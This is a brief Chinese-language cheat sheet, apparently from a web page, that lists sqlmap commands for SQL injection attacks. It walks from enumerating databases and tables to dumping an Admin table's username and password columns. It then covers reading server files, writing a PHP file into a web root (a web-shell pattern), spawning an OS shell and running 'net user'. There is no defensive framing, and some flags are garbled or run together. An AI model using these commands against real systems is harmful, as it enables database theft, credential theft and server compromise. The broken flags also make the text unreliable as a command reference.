获取所有数据库命令sqlmap.py -u URL –dbs
实操:sqlmap.py -r c:\2.txt --dbs
获取当前数据库命令:sqlmap.py -u URL --current-db
实操sqlmap.py -r c:\2.txt --current-db
获取当前表:sqlmap.py
-u URL -D 数据库名称 –-tables
实操sqlmap.py -r c:\2.txt -D TestDB --tables
获取字段命令:sqlmap.py -u URL -D数据库名称 -T 表名–columns
实操sqlmap.py -r c:\2.txt -D TestDB -T Admin--columns
脱库命令:sqlmap.py -u URL -D数据库名称 -T 表名 -C
username,password –dump
实操sqlmap.py -r c:\2.txt -D TestDB -T Admin -C
username,password --dump
文件读取下载sqlmap.py -u http://192.168.0.110:8080/sql.php?id=1 --file-read"c://1.txt"
文件上传:sqlmap.py -u http://192.168.0.110/sqlserver/1.aspx?xxser=1--file-write "c:/1.txt"--file-dest "C:/php/htdocs/666.php" -v1
获取os shell
sqlmap.py -u “url”--os-shell /*系统交互的shell*/
sqlmap.py -u “url”--os-cmd="net user” /*执行net user命令*/
sqlmap.py -u “url”--os-shell /*系统交互的shell*/
网友评论